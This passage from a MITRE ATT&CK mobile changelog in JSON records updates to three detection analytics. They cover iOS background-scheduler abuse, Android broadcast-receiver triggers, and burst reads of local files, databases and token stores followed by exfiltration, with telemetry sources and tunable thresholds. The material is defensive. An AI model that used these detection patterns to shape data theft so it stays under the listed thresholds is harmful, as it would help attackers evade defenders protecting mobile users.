nowrap=\"nowrap\"><span class=\"diff_add\">ing,&nbsp;later&nbsp;wake&nbsp;or&nbsp;execution&nbsp;of&nbsp;the&nbsp;scheduled&nbsp;work,&nbsp;and&nbsp;post</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-trigger&nbsp;activity&nbsp;such&nbsp;as&nbsp;network&nbsp;sessions,&nbsp;local&nbsp;staging,&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;sensor&nbsp;access.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f10a7842-ddb2-488b-93ac-e53fa6476614",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 17:09:39.997000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0707#AN1830",
                            "external_id": "AN1830"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1830",
                    "description": "The defender correlates creation of background scheduler activity with later execution of repeating or deferred work by the same managed app, then raises confidence when the triggered activity produces network, local-write, or other app behavior that occurs outside expected user context. Because iOS exposes weaker direct scheduling observability in many enterprise environments, the analytic anchors first on managed app posture and lifecycle-to-network or lifecycle-to-file effects, with NSBackgroundActivityScheduler-related behavior treated as strongest when runtime telemetry can observe background scheduler usage or execution callbacks.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
                            "name": "MobiledEDR:telemetry",
                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between scheduler creation, later execution, and follow-on file or network behavior"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Managed apps legitimately expected to perform background maintenance or deferred sync behavior"
                        },
                        {
                            "field": "AllowedExecutionIntervals",
                            "description": "Expected repeating interval or defer window for legitimate background activity"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether follow-on behavior from background scheduler execution should require recent user interaction"
                        },
                        {
                            "field": "TriggerToNetworkWindow",
                            "description": "Maximum expected delay between scheduled execution and outbound communication"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume after scheduled execution to treat network behavior as meaningful"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3\", \"name\": \"MobiledEDR:telemetry\", \"channel\": \"Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between scheduler creation, later execution, and follow-on file or network behavior\"}, {\"field\": \"AllowedAppList\", \"description\": \"Managed apps legitimately expected to perform background maintenance or deferred sync behavior\"}, {\"field\": \"AllowedExecutionIntervals\", \"description\": \"Expected repeating interval or defer window for legitimate background activity\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether follow-on behavior from background scheduler execution should require recent user interaction\"}, {\"field\": \"TriggerToNetworkWindow\", \"description\": \"Maximum expected delay between scheduled execution and outbound communication\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume after scheduled execution to treat network behavior as meaningful\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:09:39.997000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates creation of background scheduler activity with later execution of repeating or deferred work by the same managed app, then raises confidence when the triggered activity produces network, local-write, or other app behavior that occurs outside expected user context. Because iOS exposes weaker direct scheduling observability in many enterprise environments, the analytic anchors first on managed app posture and lifecycle-to-network or lifecycle-to-file effects, with NSBackgroundActivityScheduler-related behavior treated as strongest when runtime telemetry can observe background scheduler usage or execution callbacks.\", \"old_value\": \"Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to97__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to97__0\"><a href=\"#difflib_chg_to97__top\">t</a></td><td class=\"diff_header\" id=\"from97_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Scheduling&nbsp;tasks/jobs&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;detect,&nbsp;and&nbsp;theref</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to97__top\">t</a></td><td class=\"diff_header\" id=\"to97_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;creation&nbsp;of&nbsp;background&nbsp;scheduler&nbsp;act</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ore&nbsp;enterprises&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;a</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ivity&nbsp;with&nbsp;later&nbsp;execution&nbsp;of&nbsp;repeating&nbsp;or&nbsp;deferred&nbsp;work&nbsp;by&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">t&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">the&nbsp;same&nbsp;managed&nbsp;app,&nbsp;then&nbsp;raises&nbsp;confidence&nbsp;when&nbsp;the&nbsp;trigge</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">red&nbsp;activity&nbsp;produces&nbsp;network,&nbsp;local-write,&nbsp;or&nbsp;other&nbsp;app&nbsp;beh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">avior&nbsp;that&nbsp;occurs&nbsp;outside&nbsp;expected&nbsp;user&nbsp;context.&nbsp;Because&nbsp;iOS</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;exposes&nbsp;weaker&nbsp;direct&nbsp;scheduling&nbsp;observability&nbsp;in&nbsp;many&nbsp;ente</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rprise&nbsp;environments,&nbsp;the&nbsp;analytic&nbsp;anchors&nbsp;first&nbsp;on&nbsp;managed&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pp&nbsp;posture&nbsp;and&nbsp;lifecycle-to-network&nbsp;or&nbsp;lifecycle-to-file&nbsp;eff</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ects,&nbsp;with&nbsp;NSBackgroundActivityScheduler-related&nbsp;behavior&nbsp;tr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eated&nbsp;as&nbsp;strongest&nbsp;when&nbsp;runtime&nbsp;telemetry&nbsp;can&nbsp;observe&nbsp;backgr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ound&nbsp;scheduler&nbsp;usage&nbsp;or&nbsp;execution&nbsp;callbacks.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--fbc0a210-8942-4fcb-81f1-a120551013d4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 21:18:39.945000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0711#AN1837",
                            "external_id": "AN1837"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1837",
                    "description": "Correlates (1) application registration or activation of broadcast receivers tied to system or app-generated intents, (2) event-triggered execution while the application is not in the foreground, and (3) immediate follow-on actions such as network communication or data access. The defender observes a causal chain where an external event (e.g., BOOT_COMPLETED, SMS_RECEIVED, USER_PRESENT, CONNECTIVITY_CHANGE) triggers application execution that bypasses normal user-driven lifecycle expectations, followed by background processing or outbound activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Time correlation window between broadcast event and subsequent execution or network activity"
                        },
                        {
                            "field": "SensitiveIntentList",
                            "description": "List of broadcast intents considered high-risk (e.g., BOOT_COMPLETED, SMS_RECEIVED)"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Baseline of legitimate applications expected to use broadcast receivers for these intents"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Determines whether execution without foreground presence increases detection confidence"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Time correlation window between broadcast event and subsequent execution or network activity\"}, {\"field\": \"SensitiveIntentList\", \"description\": \"List of broadcast intents considered high-risk (e.g., BOOT_COMPLETED, SMS_RECEIVED)\"}, {\"field\": \"AllowedAppList\", \"description\": \"Baseline of legitimate applications expected to use broadcast receivers for these intents\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Determines whether execution without foreground presence increases detection confidence\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 21:18:39.945000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application registration or activation of broadcast receivers tied to system or app-generated intents, (2) event-triggered execution while the application is not in the foreground, and (3) immediate follow-on actions such as network communication or data access. The defender observes a causal chain where an external event (e.g., BOOT_COMPLETED, SMS_RECEIVED, USER_PRESENT, CONNECTIVITY_CHANGE) triggers application execution that bypasses normal user-driven lifecycle expectations, followed by background processing or outbound activity.\", \"old_value\": \"Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. \"}, \"root['x_mitre_log_source_references'][0]['x_mitre_data_component_ref']\": {\"new_value\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"old_value\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\"}, \"root['x_mitre_log_source_references'][0]['name']\": {\"new_value\": \"MobileEDR:telemetry\", \"old_value\": \"Application Vetting\"}, \"root['x_mitre_log_source_references'][0]['channel']\": {\"new_value\": \"application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events\", \"old_value\": \"None\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to95__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to95__0\"><a href=\"#difflib_chg_to95__top\">t</a></td><td class=\"diff_header\" id=\"from95_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;which&nbsp;broadcast&nbsp;inte</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to95__top\">t</a></td><td class=\"diff_header\" id=\"to95_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application&nbsp;registration&nbsp;or&nbsp;activation&nbsp;of&nbsp;bro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nts&nbsp;an&nbsp;application&nbsp;registers&nbsp;for&nbsp;and&nbsp;which&nbsp;permissions&nbsp;it&nbsp;re</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">adcast&nbsp;receivers&nbsp;tied&nbsp;to&nbsp;system&nbsp;or&nbsp;app-generated&nbsp;intents,&nbsp;(2</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">quests.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)&nbsp;event-triggered&nbsp;execution&nbsp;while&nbsp;the&nbsp;application&nbsp;is&nbsp;not&nbsp;in&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">the&nbsp;foreground,&nbsp;and&nbsp;(3)&nbsp;immediate&nbsp;follow-on&nbsp;actions&nbsp;such&nbsp;as&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">network&nbsp;communication&nbsp;or&nbsp;data&nbsp;access.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;an&nbsp;external&nbsp;event&nbsp;(e.g.,&nbsp;BOOT_COMPLETED</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;SMS_RECEIVED,&nbsp;USER_PRESENT,&nbsp;CONNECTIVITY_CHANGE)&nbsp;triggers&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">application&nbsp;execution&nbsp;that&nbsp;bypasses&nbsp;normal&nbsp;user-driven&nbsp;lifec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ycle&nbsp;expectations,&nbsp;followed&nbsp;by&nbsp;background&nbsp;processing&nbsp;or&nbsp;outb</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ound&nbsp;activity.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--983ae9ea-a125-498a-862d-00d5bed2087a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-08 20:08:28.641000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0713#AN1840",
                            "external_id": "AN1840"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1840",
                    "description": "The defender correlates newly granted or recently exercised storage- or privilege-relevant access with burst reads of local files, local databases, or protected records from operating-system or external-storage locations, especially when the reads are inconsistent with app role, occur in background or locked-device context, or are followed by temporary data staging or network transmission. The analytic emphasizes Android-specific observables such as external storage access, app-private database reads where visible to the sensor, and repeated enumeration/read activity against local paths associated with media, tokens, caches, or exported application data.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed app granted or retaining storage-related or elevated access inconsistent with declared function prior to local data access activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between permission state, local data reads, optional staging, and outbound transfer"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to read local files or databases such as backup, sync, file manager, security, or media management apps"
                        },
                        {
                            "field": "AllowedPathList",
                            "description": "Expected local paths, storage roots, and database locations for legitimate app behavior"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether sensitive local data access should happen only during active user-driven workflows"
                        },
                        {
                            "field": "BurstReadThreshold",
                            "description": "Minimum number of file or record reads within a short interval required to indicate suspicious collection"
                        },
                        {
                            "field": "SensitivePathPatterns",
                            "description": "Environment-specific list of high-value local paths such as external media roots, app export folders, token stores, or browser data locations"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum upload size expected if collection is followed by exfiltration"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app granted or retaining storage-related or elevated access inconsistent with declared function prior to local data access activity\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between permission state, local data reads, optional staging, and outbound transfer\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to read local files or databases such as backup, sync, file manager, security, or media management apps\"}, {\"field\": \"AllowedPathList\", \"description\": \"Expected local paths, storage roots, and database locations for legitimate app behavior\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether sensitive local data access should happen only during active user-driven workflows\"}, {\"field\": \"BurstReadThreshold\", \"description\": \"Minimum number of file or record reads within a short interval required to indicate suspicious collection\"}, {\"field\": \"SensitivePathPatterns\", \"description\": \"Environment-specific list of high-value local paths such as external media roots, app export folders, token stores, or browser data locations\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum upload size expected if collection is followed by exfiltration\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 20:08:28.641000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates newly granted or recently exercised storage- or privilege-relevant access with burst reads of local files, local databases, or protected records from operating-system or external-storage locations, especially when the reads are inconsistent with app role, occur in background or locked-device context, or are followed by temporary data staging or network transmission. The analytic emphasizes Android-specific observables such as external storage access, app-private database reads where visible to the sensor, and repeated enumeration/read activity against local paths associated with media, tokens, caches, or exported application data.\", \"old_value\": \"Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to130__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to130__0\"><a href=\"#difflib_chg_to130__top\">t</a></td><td class=\"diff_header\" id=\"from130_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Accessing&nbsp;data&nbsp;from&nbsp;the&nbsp;local&nbsp;system&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;det</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to130__top\">t</a></td><td class=\"diff_header\" id=\"to130_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;newly&nbsp;granted&nbsp;or&nbsp;recently&nbsp;exercised&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ect,&nbsp;and&nbsp;therefore&nbsp;enterprises&nbsp;may&nbsp;be&nbsp;better&nbsp;served&nbsp;focusing</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">storage-&nbsp;or&nbsp;privilege-relevant&nbsp;access&nbsp;with&nbsp;burst&nbsp;reads&nbsp;of&nbsp;lo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversarial&nbsp;behavior.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cal&nbsp;files,&nbsp;local&nbsp;databases,&nbsp;or&nbsp;protected&nbsp;records&nbsp;from&nbsp;operat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing-system&nbsp;or&nbsp;external-storage&nbsp;locations,&nbsp;especially&nbsp;when&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;reads&nbsp;are&nbsp;inconsistent&nbsp;with&nbsp;app&nbsp;role,&nbsp;occur&nbsp;in&nbsp;background&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">or&nbsp;locked-device&nbsp;context,&nbsp;or&nbsp;are&nbsp;followed&nbsp;by&nbsp;temporary&nbsp;data&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">staging&nbsp;or&nbsp;network&nbsp;transmission.&nbsp;The&nbsp;analytic&nbsp;emphasizes&nbsp;And</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">roid-specific&nbsp;observables&nbsp;such&nbsp;as&nbsp;external&nbsp;storage&nbsp;access,&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pp-private&nbsp;database&nbsp;reads&nbsp;where&nbsp;visible&nbsp;to&nbsp;the&nbsp;sensor,&nbsp;and&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td 